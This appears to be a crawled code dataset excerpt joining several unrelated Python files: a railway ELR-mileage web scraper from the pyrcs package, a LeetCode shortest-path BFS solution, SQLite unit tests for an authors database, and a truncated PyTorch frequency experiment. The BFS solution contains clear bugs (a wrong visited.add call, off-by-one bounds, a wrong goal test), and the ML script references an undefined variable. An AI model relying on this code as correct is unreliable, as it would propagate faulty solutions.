mor_mileage_file['Mileage']['Later measure']\n Mileage Mileage_Note Miles_Chains ... Link_1 Link_1_ELR Link_1_Mile_Chain\n 0 0.0000 0.00 ... SWA (215.26) SWA 215.26\n 1 0.0176 0.08 ... SWA (215.18) SWA 215.18\n 2 0.0968 0.44 ... None\n 3 1.0132 1.06 ... None\n 4 1.1342 1.61 ... None\n 5 2.0242 2.11 ... None\n 6 2.1012 2.46 ... None\n 7 ... None\n 8 3.0638 3.29 ... SDI2 (2.79) SDI2 2.79\n [9 rows x 8 columns]\n\n >>> fed_mileage_file = em.collect_mileage_file(elr='FED')\n To collect mileage file of \"FED\"\n ? [No]|Yes: yes\n >>> type(fed_mileage_file['Mileage'])\n dict\n >>> list(fed_mileage_file['Mileage'].keys())\n ['Current route', 'Original route']\n >>> fed_mileage_file['Mileage']['Current route']\n Mileage Mileage_Note ... Link_1_ELR Link_1_Mile_Chain\n 0 83.1254 ... FEL\n 1 84.0198 ...\n 2 84.1430 ...\n 3 84.1540 ...\n 4 85.0484 ...\n 5 85.1122 ...\n 6 85.1188 ... TFN 2.13\n [7 rows x 8 columns]\n >>> fed_mileage_file['Mileage']['Original route']\n Mileage Mileage_Note Miles_Chains ... Link_1 Link_1_ELR Link_1_Mile_Chain\n 0 0.0000 0.00 ... FEL (84.22) FEL 84.22\n 1 1.0176 1.08 ... None\n 2 1.1540 1.70 ... None\n 3 1.1694 1.77 ... None\n [4 rows x 8 columns]\n \"\"\"\n\n elr_ = remove_punctuation(elr).upper()\n\n if elr_ != '':\n\n mileage_file = None\n\n if confirmed(f\"To collect mileage file of \\\"{elr_}\\\"\\n?\", confirmation_required):\n\n if verbose == 2:\n print(f\"Collecting mileage file of \\\"{elr_}\\\"\", end=\" ... \")\n\n try:\n url = home_page_url() + f'/elrs/_mileages/{elr_[0]}/{elr_}.shtm'.lower()\n source = requests.get(url=url, headers=fake_requests_headers())\n\n except Exception as e:\n if verbose == 2:\n print(\"Failed.\", end=\" \")\n print_inst_conn_err(verbose=verbose, e=e)\n\n else:\n try:\n soup = bs4.BeautifulSoup(markup=source.content, features='html.parser')\n\n line_name = soup.find(name='h3').text\n\n sub_line_name_ = soup.find(name='h4')\n if sub_line_name_ is not None:\n sub_line_name = sub_line_name_.get_text()\n else:\n sub_line_name = ''\n\n err404 = {'\"404\" error: page not found', '404 error: page not found'}\n if any(x in err404 for x in {line_name, sub_line_name}):\n elr_data = self.collect_elr_by_initial(elr_[0])[elr_[0]]\n elr_data = elr_data[elr_data['ELR'] == elr_]\n\n notes_dat = elr_data['Notes'].iloc[0]\n if re.match(r'(Now( part of)? |= |See )[A-Z]{3}(\\d)?$', notes_dat):\n elr_alt = re.search(r'(?<= )[A-Z]{3}(\\d)?', notes_dat).group(0)\n mileage_file_alt = self.collect_mileage_file(\n elr=elr_alt, parsed=parsed, confirmation_required=False,\n dump_it=False, verbose=verbose)\n\n if notes_dat.startswith('Now'):\n mileage_file_former = copy.copy(mileage_file_alt)\n\n mileage_file_alt.update({'Formerly': elr_})\n self._dump_mileage_file(elr_alt, mileage_file_alt, dump_it, verbose)\n\n mileage_file_former.update(({'Now': elr_alt}))\n self._dump_mileage_file(elr_, mileage_file_former, dump_it, verbose)\n\n return mileage_file_alt\n\n else:\n line_name, content = self._get_parsed_contents(elr_data, notes_dat)\n\n else:\n ln_temp = line_name.split('\\t')\n line_name = ln_temp[0] if len(ln_temp) == 1 else ln_temp[1]\n\n content = [\n x.strip().split('\\t', 1) for x in soup.find('pre').text.splitlines()\n if x != '']\n content = [\n [y.replace(' ', ' ').replace('\\t', ' ') for y in x] for x in content]\n content = [\n [''] + x if (len(x) == 1) & ('Note that' not in x[0]) else x\n for x in content]\n\n # assert sub_headers[0] == elr\n if sub_line_name and (sub_line_name not in err404):\n sub_ln_temp = sub_line_name.split('\\t')\n sub_headers = sub_ln_temp[0] if len(sub_ln_temp) == 1 else sub_ln_temp[1]\n else:\n sub_headers = ''\n\n # Make a dict of line information\n line_info = {'ELR': elr_, 'Line': line_name, 'Sub-Line': sub_headers}\n\n # Search for notes\n notes_dat = []\n parsed_content = content.copy()\n # measure_headers = []\n measure_headers_indices = []\n for i, x in enumerate(content):\n if len(x) == 1:\n x_ = x[0] + '.' if x[0].endswith(tuple(string.ascii_letters)) else x[0]\n notes_dat.append(x_)\n parsed_content.remove(x)\n else:\n mil_dat, txt_dat = x\n if mil_dat == '':\n if 'Distances in km' in txt_dat or \\\n 'measured from accurate mapping systems' in txt_dat or \\\n len(txt_dat) >= 50:\n notes_dat.append(txt_dat)\n parsed_content.remove(x)\n elif txt_dat in self.measure_headers:\n # measure_headers.append(txt_dat)\n measure_headers_indices.append(i)\n elif 'Revised distances are thus:' in txt_dat:\n txt_dat = 'Current measure'\n content[i] = [mil_dat, txt_dat]\n # measure_headers.append(txt_dat)\n measure_headers_indices.append(i)\n elif re.search(r'\\bmeasure\\b', txt_dat):\n # measure_headers.append(txt_dat)\n measure_headers_indices.append(i)\n else:\n pass\n\n if any('Distances in km' in x for x in notes_dat):\n parsed_content = [\n [x[0] + 'km', x[1]] if not x[0].endswith('km') else x\n for x in parsed_content]\n\n # Make a dict of note\n notes_data = {'Notes': ' '.join(notes_dat).strip()}\n\n # Create a table of the mileage data\n mileage_data = pd.DataFrame(parsed_content, columns=['Mileage', 'Node'])\n\n # If there are multiple measures in 'mileage_data', e.g. current/former measures\n mileage_data = self._split_measures(\n mileage_data=mileage_data, measure_headers_indices=measure_headers_indices)\n\n if parsed:\n if isinstance(mileage_data, dict) and len(mileage_data) > 1:\n mileage_data = {\n h: self._parse_mileage_data(mileage_data=dat)\n for h, dat in mileage_data.items()}\n else: # isinstance(dat, pd.DataFrame)\n mileage_data = self._parse_mileage_data(mileage_data=mileage_data)\n\n mileage_file = dict(\n pair for x in [line_info, {'Mileage': mileage_data}, notes_data]\n for pair in x.items())\n\n if verbose == 2:\n print(\"Done.\")\n\n self._dump_mileage_file(\n elr=elr_, mileage_file=mileage_file, dump_it=dump_it, verbose=verbose)\n\n except Exception as e:\n print(f\"Failed. {format_err_msg(e)}\")\n\n return mileage_file\n\n def fetch_mileage_file(self, elr, update=False, dump_dir=None, verbose=False):\n \"\"\"\n Fetch the mileage file for a given ELR.\n\n :param elr: elr: ELR, e.g. ``'CJD'``, ``'MLA'``, ``'FED'``\n :type elr: str\n :param update: whether to do an update check (for the package data), defaults to ``False``\n :type update: bool\n :param dump_dir: pathname of a directory where the data file is dumped, defaults to ``None``\n :type dump_dir: str or None\n :param verbose: whether to print relevant information in console, defaults to ``False``\n :type verbose: bool or int\n :return: mileage file (codes), line name and, if any, additional information/notes\n :rtype: dict\n\n **Examples**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> # Get the mileage file of 'AAL' (Now 'NAJ3')\n >>> aal_mileage_file = em.fetch_mileage_file(elr='AAL')\n >>> type(aal_mileage_file)\n dict\n >>> list(aal_mileage_file.keys())\n ['ELR', 'Line', 'Sub-Line', 'Mileage', 'Notes', 'Formerly']\n\n >>> aal_mileage_file['ELR']\n 'NAJ3'\n >>> aal_mileage_file['Notes']\n 'Note that Ashendon Junction up line junction is on NAJ2'\n >>> aal_mileage_file['Mileage']\n Mileage Mileage_Note ... Link_1_ELR Link_1_Mile_Chain\n 0 0.0000 ... NAJ2 33.69\n 1 0.0594 ... GUA 164.75\n 2 1.0396 ...\n 3 3.0682 ...\n 4 6.0704 ...\n 5 8.0572 ... BSG 0.00\n 6 8.0990 ... WEJ\n 7 9.0594 ...\n 8 13.0264 ...\n 9 17.0858 ...\n 10 17.0968 ...\n 11 18.0572 ... DCL 81.10\n 12 18.0638 ... DCL 81.12\n [13 rows x 8 columns]\n\n >>> # Get the mileage file of 'MLA'\n >>> mla_mileage_file = em.fetch_mileage_file(elr='MLA')\n >>> type(mla_mileage_file)\n dict\n >>> list(mla_mileage_file.keys())\n ['ELR', 'Line', 'Sub-Line', 'Mileage', 'Notes']\n >>> mla_mileage_file_mileages = mla_mileage_file['Mileage']\n >>> type(mla_mileage_file_mileages)\n dict\n >>> list(mla_mileage_file_mileages.keys())\n ['Current measure', 'Original measure']\n >>> mla_mileage_file_mileages['Original measure']\n Mileage Mileage_Note ... Link_3_ELR Link_3_Mile_Chain\n 0 4.1386 ... NEM4 0.00\n 1 5.0616 ...\n 2 5.1122 ...\n [3 rows x 14 columns]\n >>> mla_mileage_file_mileages['Current measure']\n Mileage Mileage_Note Miles_Chains ... Link_1 Link_1_ELR Link_1_Mile_Chain\n 0 0.0000 0.00 ... MRL2 (4.44) MRL2 4.44\n 1 0.0572 0.26 ... None\n 2 0.1540 0.70 ... None\n 3 0.1606 0.73 ... None\n [4 rows x 8 columns]\n \"\"\"\n\n try:\n elr_ = remove_punctuation(elr)\n data_name, _ = self._mileage_file_dump_names(elr_)\n ext = \".pkl\"\n path_to_pickle = self._cdd(\"mileage-files\", data_name[0], data_name + ext, mkdir=False)\n\n if os.path.isfile(path_to_pickle) and not update:\n mileage_file = load_data(path_to_pickle)\n\n else:\n verbose_ = collect_in_fetch_verbose(data_dir=dump_dir, verbose=verbose)\n mileage_file = self.collect_mileage_file(\n elr=elr_, parsed=True, confirmation_required=False, dump_it=True, verbose=verbose_)\n\n if dump_dir is not None:\n save_data_to_file(\n cls=self, data=mileage_file, data_name=data_name, ext=ext, dump_dir=dump_dir,\n verbose=verbose)\n\n except Exception as e:\n if verbose:\n print(\"Some errors occurred when fetching the data. {}\".format(e))\n mileage_file = None\n\n return mileage_file\n\n @staticmethod\n def search_conn(start_elr, start_em, end_elr, end_em):\n \"\"\"\n Search for connection between two ELR-and-mileage pairs.\n\n :param start_elr: start ELR\n :type start_elr: str\n :param start_em: mileage file of the start ELR\n :type start_em: pandas.DataFrame\n :param end_elr: end ELR\n :type end_elr: str\n :param end_em: mileage file of the end ELR\n :type end_em: pandas.DataFrame\n :return: connection (, )\n :rtype: tuple\n\n **Examples**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> elr_1 = 'AAM'\n >>> mileage_file_1 = em.collect_mileage_file(elr_1, confirmation_required=False)\n >>> mf_1_mileages = mileage_file_1['Mileage']\n >>> mf_1_mileages.head()\n Mileage Mileage_Note ... Link_2_ELR Link_2_Mile_Chain\n 0 0.0000 ...\n 1 0.0154 ...\n 2 0.0396 ...\n 3 1.1012 ...\n 4 1.1408 ...\n [5 rows x 11 columns]\n\n >>> elr_2 = 'ANZ'\n >>> mileage_file_2 = em.collect_mileage_file(elr_2, confirmation_required=False)\n >>> mf_2_mileages = mileage_file_2['Mileage']\n >>> mf_2_mileages.head()\n Mileage Mileage_Note Miles_Chains ... Link_1 Link_1_ELR Link_1_Mile_Chain\n 0 84.0924 84.42 ... BEA BEA\n 1 84.1364 84.62 ... AAM (0.18) AAM 0.18\n [2 rows x 8 columns]\n\n >>> elr_1_dest, elr_2_orig = em.search_conn(elr_1, mf_1_mileages, elr_2, mf_2_mileages)\n >>> elr_1_dest\n '0.0396'\n >>> elr_2_orig\n '84.1364'\n \"\"\"\n\n start_mask = start_em.apply(lambda x: x.str.contains(end_elr, case=False).any(), axis=1)\n start_temp = start_em[start_mask]\n assert isinstance(start_temp, pd.DataFrame)\n\n if not start_temp.empty:\n # Get exact location\n key_idx = start_temp.index[0]\n mile_chain_col = [x for x in start_temp.columns if re.match(r'.*_Mile_Chain', x)][0]\n\n start_dest_mileage = start_em.loc[key_idx, 'Mileage'] # Mileage of the Start ELR\n end_orig_mile_chain = start_temp.loc[key_idx, mile_chain_col] # Mileage of the End ELR\n\n if end_orig_mile_chain and end_orig_mile_chain != 'Unknown':\n end_orig_mileage = mile_chain_to_mileage(end_orig_mile_chain)\n\n else: # end_conn_mile_chain == '':\n end_mask = end_em.apply(lambda x: x.str.contains(start_elr, case=False).any(), axis=1)\n end_temp = end_em[end_mask]\n\n if not end_temp.empty:\n end_orig_mileage = end_temp['Mileage'].iloc[0]\n else:\n end_orig_mileage = start_dest_mileage\n\n else:\n start_dest_mileage, end_orig_mileage = '', ''\n\n return start_dest_mileage, end_orig_mileage\n\n def get_conn_mileages(self, start_elr, end_elr, update=False, **kwargs):\n \"\"\"\n Get a connection point between two ELR-and-mileage pairs.\n\n Namely, find the end and start mileages for the start and end ELRs, respectively.\n\n .. note::\n\n This function may not be able to find the connection for every pair of ELRs.\n See :ref:`Example 2` below.\n\n :param start_elr: start ELR\n :type start_elr: str\n :param end_elr: end ELR\n :type end_elr: str\n :param update: whether to do an update check (for the package data), defaults to ``False``\n :type update: bool\n :param kwargs: [optional] parameters of the method\n :py:meth:`ELRMileages.fetch_mileage_file()\n `\n :return: connection ELR and mileages between the given ``start_elr`` and ``end_elr``\n :rtype: tuple\n\n **Example 1**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> conn = em.get_conn_mileages(start_elr='NAY', end_elr='LTN2')\n >>> (s_dest_mlg, c_elr, c_orig_mlg, c_dest_mlg, e_orig_mlg) = conn\n\n >>> s_dest_mlg\n '5.1606'\n >>> c_elr\n 'NOL'\n >>> c_orig_mlg\n '5.1606'\n >>> c_dest_mlg\n '0.0638'\n >>> e_orig_mlg\n '123.1320'\n\n .. _get_conn_mileages-example-2:\n\n **Example 2**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> conn = em.get_conn_mileages(start_elr='MAC3', end_elr='DBP1', dump_dir=\"tests\")\n >>> conn\n ('', '', '', '', '')\n \"\"\"\n\n kwargs.update({'update': update})\n\n start_file, end_file = map(\n functools.partial(self.fetch_mileage_file, **kwargs), [start_elr, end_elr])\n\n if start_file is not None and end_file is not None:\n start_elr, end_elr = start_file['ELR'], end_file['ELR']\n start_em, end_em = start_file['Mileage'], end_file['Mileage']\n key_pat = re.compile(r'(Current\\s)|(One\\s)|(Later\\s)|(Usual\\s)')\n\n if isinstance(start_em, dict):\n start_em = start_em[[k for k in start_em.keys() if re.match(key_pat, k)][0]]\n if isinstance(end_em, dict):\n end_em = end_em[[k for k in end_em.keys() if re.match(key_pat, k)][0]]\n\n start_dest_mileage, end_orig_mileage = self.search_conn(\n start_elr=start_elr, start_em=start_em, end_elr=end_elr, end_em=end_em)\n\n conn_elr, conn_orig_mileage, conn_dest_mileage = '', '', ''\n\n if not start_dest_mileage and not end_orig_mileage:\n link_cols = [x for x in start_em.columns if re.match(r'Link_\\d_ELR.?', x)]\n conn_elrs = start_em[link_cols]\n\n i = 0\n while i < len(link_cols):\n link_col = link_cols[i]\n conn_temp = conn_elrs[conn_elrs.astype(bool)].dropna(how='all')[link_col].dropna()\n\n j = 0\n while j < len(conn_temp):\n conn_elr = conn_temp.iloc[j]\n conn_em = self.fetch_mileage_file(elr=conn_elr, update=update)\n if conn_em is not None:\n conn_elr, conn_em = conn_em['ELR'], conn_em['Mileage']\n if isinstance(conn_em, dict):\n conn_em = conn_em[\n [k for k in conn_em.keys() if re.match(key_pat, k)][0]]\n\n start_dest_mileage, conn_orig_mileage = self.search_conn(\n start_elr, start_em, conn_elr, conn_em)\n\n conn_dest_mileage, end_orig_mileage = self.search_conn(\n conn_elr, conn_em, end_elr, end_em)\n\n if conn_dest_mileage and end_orig_mileage:\n if not start_dest_mileage:\n start_dest_mileage = start_em[\n start_em[link_col] == conn_elr]['Mileage'].values[0]\n if not conn_orig_mileage:\n link_col_conn = conn_em.where(conn_em == start_elr).dropna(\n axis=1, how='all').columns[0]\n temp = conn_em[conn_em[link_col_conn] == start_elr].Mileage\n conn_orig_mileage = temp.values[0]\n break\n\n else:\n conn_elr = ''\n j += 1\n\n if conn_elr != '':\n break\n # else:\n i += 1\n\n if conn_orig_mileage and not conn_elr:\n start_dest_mileage, conn_orig_mileage = '', ''\n\n else:\n start_dest_mileage, conn_elr, conn_orig_mileage, conn_dest_mileage, end_orig_mileage = \\\n [''] * 5\n\n return start_dest_mileage, conn_elr, conn_orig_mileage, conn_dest_mileage, end_orig_mileage\n","repo_name":"mikeqfu/pyrcs","sub_path":"pyrcs/line_data/elr_mileage.py","file_name":"elr_mileage.py","file_ext":"py","file_size_in_byte":55147,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"96"} +{"seq_id":"35571809399","text":"import collections\n\n\nclass Solution:\n def shortestPathBinaryMatrix(self, grid: List[List[int]]) -> int:\n rows, cols = len(grid), len(grid[0])\n\n if grid[0][0]:\n return -1\n\n visited = set()\n\n q = collections.deque()\n\n directions = [[0, 1], [1, 0], [0, -1], [-1, 0], [1, 1], [-1, 1], [1, -1], [-1, -1]]\n\n q.append((0, 0, 1))\n\n while q:\n r, c, count = q.popleft()\n\n if r == c == rows:\n return count\n\n for dr, dc in directions:\n next_r = r + dr\n next_c = c + dc\n if (next_r, next_c) not in visited and 0 <= next_r <= rows and 0 <= next_c <= cols and grid[next_r][\n next_c] == 0:\n visited.add(next_r, next_c)\n q.append((next_r, next_c, count + 1))\n\n return -1\n","repo_name":"pradeep288/leetcode-soln-python","sub_path":"google/16/1091_shortestPathBinaryMatrix.py","file_name":"1091_shortestPathBinaryMatrix.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"28085413009","text":"import unittest\nfrom final import *\n\n## All tests are done under the assumption that the database is filled with\n## the info from the sample search of preselected authors\n\n## it may take an abnormal amount of time to run if there is no cache saved\n\nclass TestAuthorTable(unittest.TestCase):\n\n def test_names(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT Name\n FROM Authors\n '''\n results = cur.execute(sql)\n results_list = results.fetchall()\n\n self.assertIn(('Mike Lupica',), results_list)\n self.assertEqual(len(results_list), 10)\n\n def test_birth_dates(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT BirthDate\n FROM Authors\n WHERE Name=\"Hunter Thompson\"\n '''\n results = cur.execute(sql)\n result_list = results.fetchall()\n\n self.assertIn(('(1937-07-18)',), result_list)\n\n def test_alive(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT Name\n FROM Authors\n WHERE DeathDate=\"Alive\"\n '''\n results = cur.execute(sql)\n results_list = results.fetchall()\n\n self.assertIn(('Stephen King',), results_list)\n self.assertEqual(len(results_list), 4)\n\nclass TestBookTable(unittest.TestCase):\n\n def test_total_books(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT Title\n FROM Books\n '''\n results = cur.execute(sql)\n results_list = results.fetchall()\n\n self.assertIn(('Cujo',), results_list)\n self.assertEqual(len(results_list), 300)\n\n def test_book_from_author(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT Title\n FROM Books\n WHERE AuthorId='3'\n '''\n results = cur.execute(sql)\n results_list = results.fetchall()\n\n self.assertIn(('Fear and Loathing in Las Vegas',), results_list)\n self.assertFalse('Cujo' in results_list)\n self.assertEqual(len(results_list), 30)\n\nclass TestMovieTable(unittest.TestCase):\n\n def test_total_movies(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT Title\n FROM Movies\n '''\n results = cur.execute(sql)\n results_list = results.fetchall()\n\n self.assertIn(('Kurt Vonnegut: Unstuck in Time',), results_list)\n self.assertEqual(len(results_list), 31)\n\n def test_author_movies(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT Title\n FROM Movies\n WHERE AuthorId='1'\n '''\n results = cur.execute(sql)\n results_list = results.fetchall()\n\n self.assertIn(('Jack Kerouac Slept Here',), results_list)\n self.assertEqual(len(results_list), 6)\n\nsample_search(10)\nunittest.main()\n","repo_name":"rpdalka/SI_206_Final_Project","sub_path":"final_test.py","file_name":"final_test.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"6441038172","text":"import math\nimport os\nimport pickle\nimport platform\nimport shutil\nimport sys\nimport time\nimport warnings\nfrom datetime import datetime\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom matplotlib import cm\nfrom matplotlib.ticker import FormatStrFormatter, LinearLocator\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom torch.nn import init\n\nwarnings.filterwarnings(\"ignore\")\nmatplotlib.use(\"Agg\")\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2,3,4,5,6,7\"\nLeftp = 0.18\nBottomp = 0.18\nWidthp = 0.88 - Leftp\nHeightp = 0.9 - Bottomp\npos = [Leftp, Bottomp, Widthp, Heightp]\n\n\ndef mkdir(fn): # Create a directory\n if not os.path.isdir(fn):\n os.mkdir(fn)\n\n\ndef save_fig(pltm, fntmp, fp=0, ax=0, isax=0, iseps=0, isShowPic=0): # Save the figure\n if isax == 1:\n pltm.rc(\"xtick\", labelsize=18)\n pltm.rc(\"ytick\", labelsize=10)\n ax.set_position(pos, which=\"both\")\n fnm = \"%s.png\" % (fntmp)\n pltm.savefig(fnm)\n if iseps:\n fnm = \"%s.eps\" % (fntmp)\n pltm.savefig(fnm, format=\"eps\", dpi=600)\n if fp != 0:\n fp.savefig(\"%s.pdf\" % (fntmp), bbox_inches=\"tight\")\n if isShowPic == 1:\n pltm.show()\n elif isShowPic == -1:\n return\n else:\n pltm.close()\n\n\n# All parameters\nR = {}\nR[\"times\"] = 0.5 # initial\nR[\"input_dim\"] = 1\nR[\"output_dim\"] = 1\nR[\"ActFuc\"] = 1 # 0: ReLU; 1: Tanh; 2:Sin; 3:x**50; 4:Sigmoid\nR[\"hidden_units\"] = [100, 100]\n\nR[\"learning_rate\"] = 2e-4\nR[\"learning_rateDecay\"] = 5e-8\n\nplot_epoch = 500\nR[\"train_size\"] = 100\n\nR[\"test_size\"] = 100\nR[\"x_start\"] = -5\nR[\"x_end\"] = 5\nR[\"device\"] = \"0\"\nR[\"asi\"] = 0\nR[\"tuning_points\"] = []\nR[\"check_epoch\"] = 10 # find the tuning point\nR[\"tuning_ind\"] = []\nRy = {}\nRy[\"y_all\"] = []\nRw = {}\nRw[\"weight_R\"] = []\nlenarg = np.shape(sys.argv)[\n 0\n] # Sys.argv[ ]其实就是一个列表,里边的项为用户输入的参数,关键就是要明白这参数是从程序外部输入的,而非代码本身的什么地方,要想看到它的效果就应该将程序保存了,从外部来运行程序并给出参数。\nif lenarg > 1:\n ilen = 1\n while ilen < lenarg:\n if sys.argv[ilen] == \"-m\":\n R[\"hidden_units\"] = [np.int32(sys.argv[ilen + 1])]\n if sys.argv[ilen] == \"-g\":\n R[\"device\"] = np.int32(sys.argv[ilen + 1])\n if sys.argv[ilen] == \"-t\":\n R[\"times\"] = np.float32(sys.argv[ilen + 1])\n if sys.argv[ilen] == \"-s\":\n R[\"train_size\"] = np.int32(sys.argv[ilen + 1])\n # if sys.argv[ilen]=='-lr':\n # R['learning_rate']=np.float32(sys.argv[ilen+1])\n # if sys.argv[ilen]=='-dir':\n # sBaseDir=sys.argv[ilen+1]\n ilen = ilen + 2\n\nR[\"hidden_units\"] = [200, 200, 200, 100]\nR[\"batch_size\"] = R[\"train_size\"]\nR[\"astddev\"] = 1 / (R[\"hidden_units\"][0] ** R[\"times\"])\nR[\"bstddev\"] = 1 / (R[\"hidden_units\"][0] ** R[\"times\"])\nR[\"full_net\"] = [R[\"input_dim\"]] + R[\"hidden_units\"] + [R[\"output_dim\"]]\n\nif R[\"input_dim\"] == 1:\n R[\"test_inputs\"] = np.reshape(\n np.linspace(\n R[\"x_start\"] - 0.5, R[\"x_end\"] + 0.5, num=R[\"test_size\"], endpoint=True\n ),\n [R[\"test_size\"], 1],\n )\n R[\"train_inputs\"] = np.reshape(\n np.linspace(R[\"x_start\"], R[\"x_end\"], num=R[\"train_size\"], endpoint=True),\n [R[\"train_size\"], 1],\n )\nelse:\n R[\"test_inputs\"] = (\n np.random.rand(R[\"test_size\"], R[\"input_dim\"]) * (R[\"x_end\"] - R[\"x_start\"])\n + R[\"x_start\"]\n )\n R[\"train_inputs\"] = (\n np.random.rand(R[\"train_size\"], R[\"input_dim\"]) * (R[\"x_end\"] - R[\"x_start\"])\n + R[\"x_start\"]\n )\n\n\ndef ReLU(x):\n return x * (x > 0)\n\n\n# def get_y(xs, sampleNo): # Function to fit\n# tmp = np.sin(xs)+np.sin(6*xs)\n# return tmp\n\n\ndef func0(xx):\n y_sin = np.sin(xx) + 2 * np.sin(3 * xx) + 3 * np.sin(5 * xx)\n return y_sin\n\n\ndef get_y(xx, alpha=1):\n y_sin = func0(xx)\n if alpha == 0:\n return y_sin\n out_y = np.round(y_sin / alpha)\n out_y2 = out_y * alpha\n return out_y2\n\n\ntest_inputs = R[\"test_inputs\"]\ntrain_inputs = R[\"train_inputs\"]\nR[\"y_true_train\"] = get_y(R[\"train_inputs\"])\n# Make a folder to save all output\nBaseDir_neu = \"test\"\nif platform.system() == \"Windows\":\n # device_n=\"0\"\n BaseDir0 = \"../../../nn/%s\" % (sBaseDir0)\n # BaseDir = '../../../nn/%s'%(sBaseDir)\nelse:\n # device_n=\"0\"\n # BaseDir0 = sBaseDir0\n # BaseDir = sBaseDir\n matplotlib.use(\"Agg\")\n# mkdir(BaseDir0)\n# BaseDir = '%s/%s' % (BaseDir0, example_folder)\n# mkdir(BaseDir)\n# BaseDir_a = '%s/%s' % (BaseDir, R['times'])\n# mkdir(BaseDir_a)\n# BaseDir_neu = '%s/%s' % (BaseDir_a, neu_ind_folder)\nmkdir(BaseDir_neu)\nsubFolderName = \"%s\" % (datetime.now().strftime(\"%y%m%d%H%M%S\"))\n# subFolderName = '%s'%(int(np.absolute(np.random.normal([1])*100000))//int(1))\n\n# subFolderName = '%s' % (\n# int(np.absolute(np.random.normal([1]) * 100000)) // int(1))\nFolderName = \"%s/%s/\" % (BaseDir_neu, subFolderName)\nmkdir(FolderName)\n\n# mkdir('%smodel/'%(FolderName))\n# print(subFolderName)\n\nif not platform.system() == \"Windows\":\n shutil.copy(__file__, \"%s%s\" % (FolderName, os.path.basename(__file__)))\n\ndevice = torch.device(\"cuda:%s\" % (R[\"device\"]) if torch.cuda.is_available() else \"cpu\")\n# device = torch.device(\"cpu\")\nprint(device)\n\n\ndef weights_init(m): # Initialization weight\n if isinstance(m, nn.Linear):\n m.weight.data.normal_(0, R[\"astddev\"])\n m.bias.data.normal_(0, R[\"bstddev\"])\n\n\nclass Act_op(nn.Module): # Custom activation function\n def __init__(self):\n super(Act_op, self).__init__()\n\n def forward(self, x):\n # return x ** 50 # or F.relu(x) * F.relu(1-x)\n return (F.relu(x)) ** 3\n\n\ndef getWini(\n hidden_units=[10, 20, 40],\n input_dim=1,\n output_dim_final=1,\n astddev=0.05,\n bstddev=0.05,\n):\n hidden_num = len(hidden_units)\n # print(hidden_num)\n add_hidden = [input_dim] + hidden_units\n\n w_Univ0 = []\n b_Univ0 = []\n\n for i in range(hidden_num):\n input_dim = add_hidden[i]\n output_dim = add_hidden[i + 1]\n ua_w = np.float32(\n np.random.normal(loc=0.0, scale=astddev, size=[input_dim, output_dim])\n )\n ua_b = np.float32(np.random.normal(loc=0.0, scale=bstddev, size=[output_dim]))\n w_Univ0.append(np.transpose(ua_w))\n b_Univ0.append(np.transpose(ua_b))\n ua_w = np.float32(\n np.random.normal(\n loc=0.0,\n scale=astddev,\n size=[hidden_units[hidden_num - 1], output_dim_final],\n )\n )\n ua_b = np.float32(np.random.normal(loc=0.0, scale=bstddev, size=[output_dim_final]))\n w_Univ0.append(np.transpose(ua_w))\n b_Univ0.append(np.transpose(ua_b))\n return w_Univ0, b_Univ0\n\n\ndef my_fft(\n data, freq_len=40, x_input=np.zeros(10), kk=0, min_f=0, max_f=np.pi / 3, isnorm=1\n):\n second_diff_input = np.mean(np.diff(np.diff(np.squeeze(x_input))))\n if abs(second_diff_input) < 1e-10:\n datat = np.squeeze(data)\n datat_fft = np.fft.fft(datat)\n freq_len = min(freq_len, len(datat_fft))\n print(freq_len)\n ind2 = range(freq_len)\n fft_coe = datat_fft[ind2]\n if isnorm == 1:\n return_fft = np.absolute(fft_coe)\n else:\n return_fft = fft_coe\n else:\n return_fft = get_ft_multi(\n x_input,\n data,\n kk=kk,\n freq_len=freq_len,\n min_f=min_f,\n max_f=max_f,\n isnorm=isnorm,\n )\n return return_fft\n\n\ndef get_ft_multi(x_input, data, kk=0, freq_len=100, min_f=0, max_f=np.pi / 3, isnorm=1):\n n = x_input.shape[1]\n if np.max(abs(kk)) == 0:\n k = np.linspace(min_f, max_f, num=freq_len, endpoint=True)\n kk = np.matmul(np.ones([n, 1]), np.reshape(k, [1, -1]))\n tmp = np.matmul(np.transpose(data), np.exp(-1j * (np.matmul(x_input, kk))))\n if isnorm == 1:\n return_fft = np.absolute(tmp)\n else:\n return_fft = tmp\n return np.squeeze(return_fft)\n\n\ndef SelectPeakIndex(FFT_Data, endpoint=True):\n D1 = FFT_Data[1:-1] - FFT_Data[0:-2]\n D2 = FFT_Data[1:-1] - FFT_Data[2:]\n D3 = np.logical_and(D1 > 0, D2 > 0)\n tmp = np.where(D3 == True)\n sel_ind = tmp[0] + 1\n if endpoint:\n if FFT_Data[0] - FFT_Data[1] > 0:\n sel_ind = np.concatenate([[0], sel_ind])\n if FFT_Data[-1] - FFT_Data[-2] > 0:\n Last_ind = len(FFT_Data) - 1\n sel_ind = 